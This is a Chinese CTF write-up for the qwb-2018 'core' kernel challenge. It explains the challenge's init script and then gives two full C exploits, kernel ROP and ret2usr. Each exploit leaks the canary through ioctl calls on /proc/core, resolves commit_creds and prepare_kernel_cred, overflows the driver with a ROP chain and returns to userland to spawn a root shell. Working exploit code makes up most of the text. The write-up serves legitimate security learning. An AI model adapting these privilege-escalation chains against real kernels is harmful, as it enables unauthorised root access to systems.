kernel ROP

借助​​qwb-2018 core​​​这道题目来熟悉一下,kernel ​​rop​​​及​​ret2usr​

首先看一下启动脚本

发现没有开什么保护,只开了一个​​kaslr​​​,为了方便调试我们在这里把它改成​​nokaslr​​关闭即可。

再来看一下​​init​​文件

看一下这个里面的几行命令是什么意思

1、​​mount​​的作用是将分区挂到某个文件夹下,这样我们只要访问这个文件夹就相当于访问了那个分区。

2、下面的 chomd 666 /dev/ptmx 的意思是 /dev/ptmx 可读写但不可执行

3、​​cat /proc/kallsyms > /tmp/kallsyms​​​是将​​/proc/kallsyms​​​复制到​​/tmp/kallsyms​​里

4、​​echo 1 > /proc/sys/kernel/kptr_restrict​​​的作用是使得普通用户无法从​​/proc/kallsyms​​获取到函数的地址,这里给出权限描述:

但是上面已经将​​/proc/kallsyms​​​复制到​​/tmp/kallsyms​​中,故对我们获取地址并没有什么影响,并且本题也并不一定要从这里获取地址。

5、下面几行是搭建网桥

6、​​insmod /core.ko​​​是指加载​​./core.ko​​​这个驱动,我们的​​kernel​​题目中,漏洞一般都出现在驱动当中

7、​​setsid /bin/cttyhack setuidgid 1000 /bin/sh​​​是启动时给我们的权限是普通用户,一般为了方便调试我们可以把它替换为​​setsid /bin/cttyhack setuidgid 0 /bin/sh​​​,这样会方便我们查看​​qemu​​里的一些地址。

8、​​umount​​命令是手动卸载(分离)某个文件文件系统

9、​​poweroff -d 0 -f​​​的作用是强制关闭电源并且不把记录写进​​/var/log/wtmp​​里

rop

#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/ioctl.h>

size_t vmlinux_base, offset, commit_creds, prepare_kernel_cred;
size_t user_cs, user_ss, user_sp, user_rflags;
size_t raw_vmlinux_base = 0xffffffff81000000;

size_t rop[0x100] = {0};
size_t user_buf[8] = {0};

void save_status()
{
  __asm__(
  "mov user_cs, cs;"
  "mov user_ss, ss;"
  "mov user_sp, rsp;"
  "pushf;"
  "pop user_rflags;"
  );
}

void get_shell()
{
  if (getuid() == 0)
  {
    system("/bin/sh");
  }
  else
  {
    puts("[-] get shell error");
    exit(1);
  }
}

int find_symbols()
{
  char buf[0x40]={0};

  FILE *fd = fopen("/tmp/kallsyms","r");
  if(fd == 0)
  {
    puts("[-] open /kallsyms error");
    exit(0);
  }
  
  while(fgets(buf, 0x40, fd))
  {
    if(commit_creds && prepare_kernel_cred)
    {
      printf("[+] find commit_creds: %p\n", commit_creds);
      printf("[+] find prepare_kernel_cred: %p\n", prepare_kernel_cred);
      return 0;
    }
    
    if(strstr(buf, "commit_creds") && !commit_creds)
    {
      char ptr[0x20]={0};
      strncpy(ptr, buf ,16);
      sscanf(ptr, "%lx", &commit_creds);
    }
    
    if(strstr(buf, "prepare_kernel_cred") && !prepare_kernel_cred)
    {
      char ptr[0x20]={0};
      strncpy(ptr, buf ,16);
      sscanf(ptr, "%lx", &prepare_kernel_cred); 
    }
  }
  
  return 0;
}

void main()
{
  save_status();
  int i = 0;
  int fd = open("/proc/core",2);
  if(fd == 0)
  {
    puts("[-] open file error");
    exit(0);
  }

  find_symbols();

  vmlinux_base = commit_creds - 0x9c8e0;
  size_t offset = vmlinux_base - 0xffffffff81000000;

  ioctl(fd, 0x6677889C, 0x40);
  ioctl(fd, 0x6677889B, user_buf);

  for(i=0;i<8;i++)
    printf("%d: %p\n", i, user_buf[i]);
  size_t canary = user_buf[0];
  printf("[+] find canary: %p", canary);
  
  i = 8;
  
  //commit_creds(prepare_kernel_cred(0))
  rop[i++] = canary;
  rop[i++] = 0; //rbp
  rop[i++] = 0xffffffff81000b2f + offset; // pop rdi; ret;
  rop[i++] = 0;
  rop[i++] = prepare_kernel_cred;
  rop[i++] = 0xffffffff81021e53 + offset; // pop rcx; ret;
  rop[i++] = commit_creds;
  rop[i++] = 0xffffffff811ae978 + offset; // mov rdi, rax; jmp rcx;
  rop[i++] = 0xffffffff81a012da + offset; // swapgs; popfq; ret;
  rop[i++] = 0;
  rop[i++] = 0xffffffff81050ac2 + offset; // iretq; ret;
  rop[i++] = (size_t)get_shell;
  rop[i++] = user_cs;
  rop[i++] = user_rflags;
  rop[i++] = user_sp;
  rop[i++] = user_ss;
  
  write(fd, rop, 0x100);
  ioctl(fd, 0x6677889A, 0x100 | 0xFFFFFFFFFFFF0000);
}

ret2usr

#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/ioctl.h>

size_t vmlinux_base, offset, commit_creds, prepare_kernel_cred;
size_t user_cs, user_ss, user_sp, user_rflags;
size_t raw_vmlinux_base = 0xffffffff81000000;

size_t rop[0x100] = {0};
size_t user_buf[8] = {0};

void save_status()
{
  __asm__(
  "mov user_cs, cs;"
  "mov user_ss, ss;"
  "mov user_sp, rsp;"
  "pushf;"
  "pop user_rflags;"
  );
}

void get_shell()
{
  if (getuid() == 0)
  {
    system("/bin/sh");
  }
  else
  {
    puts("[-] get shell error");
    exit(1);
  }
}

void get_root()
{
  char* (*pkc)(int) = prepare_kernel_cred;
  void (*cc)(char*) = commit_creds;
  (*cc)((*pkc)(0));
}

int find_symbols()
{
  char buf[0x40]={0};

  FILE *fd = fopen("/tmp/kallsyms","r");
  if(fd == 0)
  {
    puts("[-] open /kallsyms error");
    exit(0);
  }
  
  while(fgets(buf, 0x40, fd))
  {
    if(commit_creds && prepare_kernel_cred)
    {
      printf("[+] find commit_creds: %p\n", commit_creds);
      printf("[+] find prepare_kernel_cred: %p\n", prepare_kernel_cred);
      return 0;
    }
    
    if(strstr(buf, "commit_creds") && !commit_creds)
    {
      char ptr[0x20]={0};
      strncpy(ptr, buf ,16);
      sscanf(ptr, "%lx", &commit_creds);
    }
    
    if(strstr(buf, "prepare_kernel_cred") && !prepare_kernel_cred)
    {
      char ptr[0x20]={0};
      strncpy(ptr, buf ,16);
      sscanf(ptr, "%lx", &prepare_kernel_cred); 
    }
  }
  
  return 0;
}

void main()
{
  save_status();
  int i = 0;
  int fd = open("/proc/core",2);
  if(fd == 0)
  {
    puts("[-] open file error");
    exit(0);
  }

  find_symbols();

  vmlinux_base = commit_creds - 0x9c8e0;
  size_t offset = vmlinux_base - 0xffffffff81000000;

  ioctl(fd, 0x6677889C, 0x40);
  ioctl(fd, 0x6677889B, user_buf);

  for(i=0;i<8;i++)
    printf("%d: %p\n", i, user_buf[i]);
  size_t canary = user_buf[0];
  printf("[+] find canary: %p\n", canary);
  
  i = 8;
  
  //commit_creds(prepare_kernel_cred(0))
  rop[i++] = canary;
  rop[i++] = 0; //rbp
  rop[i++] = (size_t)get_root;
  rop[i++] = 0xffffffff81a012da + offset; // swapgs; popfq; ret;
  rop[i++] = 0;
  rop[i++] = 0xffffffff81050ac2 + offset; // iretq; ret;
  rop[i++] = (size_t)get_shell;
  rop[i++] = user_cs;
  rop[i++] = user_rflags;
  rop[i++] = user_sp;
  rop[i++] = user_ss;
  
  puts("debug");
  getchar();
  
  write(fd, rop, 0x100);
  getchar();
  ioctl(fd, 0x6677889A, 0x100 | 0xFFFFFFFFFFFF0000);
}

作者:{狒猩橙}